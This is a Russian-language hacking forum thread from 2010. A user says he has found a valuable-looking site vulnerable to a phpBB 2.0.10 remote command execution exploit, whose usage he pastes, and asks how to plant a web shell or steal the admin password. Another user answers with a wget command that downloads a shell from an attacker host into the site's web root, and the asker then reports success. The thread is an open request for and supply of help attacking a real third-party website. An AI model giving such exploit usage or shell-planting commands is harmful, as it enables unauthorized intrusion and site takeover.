Старые песня о главное (phpbb) нужна помощь

Discussion in 'Песочница' started by FlooP1k, 31 Jul 2010.

  1. FlooP1k

    FlooP1k Banned

    Joined:
    28 Jul 2010
    Messages:
    91
    Likes Received:
    66
    Reputations:
    48
    Вобщем нашел очень "жирный" сайт на который прошел эксплоит:
    PHP:
    phpBB 2.0.10 Пропустим версии с 7 по 9т.кв них присутствует те же уязвимостичто и в phpBB 2.0.10Цель: (1Выполение произвольных командОписаниеБыла выпущена так же в 2002. Данная версия встречается намного чащечем младшиеНо реже чем старшие =). Был произведён дефейс сайта phpbb.comс помощью найденной уязвимости в этой версииОписание уязвимостиНекорректная обработка входных параметров в viewtopic.phpExploithttp://milw0rm.com/id.php?id=647 Запускать "perl exp.pl [*URL] [DIR] [NUM] [CMD]" Где [*URL] - урл сайта (например http://www.test.com), [DIR] - директория в которой находится форум(например /forum/ или /forum), [NUM] - номер топика (обязательно существующего), [CMD] - команда которую следует выполнить (например ls -la, справочник всех команд *nix /threadnav7345-1-10.html)
    Конечно же темы /threadnav7345-1-10.html с *nix командами уже не существует, от сюда и возникает вопрос какие команды нужно использовать что бы залить шелл или получить пароль админа и потом залить шелл ?
     
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,248
    Likes Received:
    1,148
    Reputations:
    886
    wget http://attacker.ru/shell.txt -O /home/www/htdocs/1.php

    ну или как то так
     
    _________________________
  3. FlooP1k

    FlooP1k Banned

    Joined:
    28 Jul 2010
    Messages:
    91
    Likes Received:
    66
    Reputations:
    48
    похоже немного по другому потому что пишет:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    wget: missing URL
    Usage: wget [OPTION]... ... Try `wget --help' for more options. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
  4. FlooP1k

    FlooP1k Banned

    Joined:
    28 Jul 2010
    Messages:
    91
    Likes Received:
    66
    Reputations:
    48
    а все разобрался спасибо большое ...